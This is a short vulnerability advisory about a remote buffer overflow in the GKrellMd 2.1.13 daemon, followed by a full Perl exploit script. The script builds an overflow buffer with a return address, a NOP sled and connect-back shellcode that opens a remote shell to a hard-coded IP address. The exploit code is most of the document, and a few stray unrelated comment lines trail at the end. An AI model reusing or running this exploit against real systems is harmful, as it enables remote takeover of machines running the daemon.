source: http://www.securityfocus.com/bid/8022/info
GKrellMd has been reported prone to a remote buffer overflow vulnerability, arbitrary code execution is possible.
The issue presents itself due to a lack of sufficient bounds checking performed on network-based data. If data exceeding the maximum reserved memory buffer size is received arbitrary memory may be corrupted.
A remote attacker may ultimately exploit this issue remotely to seize control of the affected daemon and execute arbitrary code.
This vulnerability has been reported to affect Gkrellm 2.1.13.
#!/usr/bin/perl -s
# kokaninATdtors.net playing with gkrellmd on FreeBSD 4.8-RELEASE
# advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd
# I just ripped their code and made it do something useful instead
# shellcode by bighawk(i think) - wow this is badly formatted.
use IO::Socket;
if(!$ARGV[0] || !$ARGV[1])
{ print "usage: ./DSR-geekrellm.pl <host> <port> (default gkrellmd is 19150)n"; exit(-1); }
$host = $ARGV[0];
$port = $ARGV[1];
$ret = pack("l",0xbfbffa60);
$shellcode = "x31xc9xf7xe1x51x41x51x41x51x51xb0x61xcdx80x89xc3x68xd9x9dx26x26x66x68x27x10x66x51x89xe6xb2x10x52x56x50x50xb0x62xcdx80x41xb0x5ax49x51x53x53xcdx80x41xe2xf5x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x51x54x53x53xb0x3bxcdx80";
#--> connect-back to a useless ip, change it:) ^^217.157.38.38^ ^^10000^
$nop = "x90";
$buf = "A" x 128 . $ret x 2 . $nop x 500 . $shellcode;
$socket = new IO::Socket::INET
(
Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
);
die "unable to connect to $host:$port ($!)n" unless $socket;
print $socket "gkrellm 2.1.10n"; #tell the daemon wich client we have
sleep(1); #might have to adjust this on slow connections
print $socket $buf;
close($socket);
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666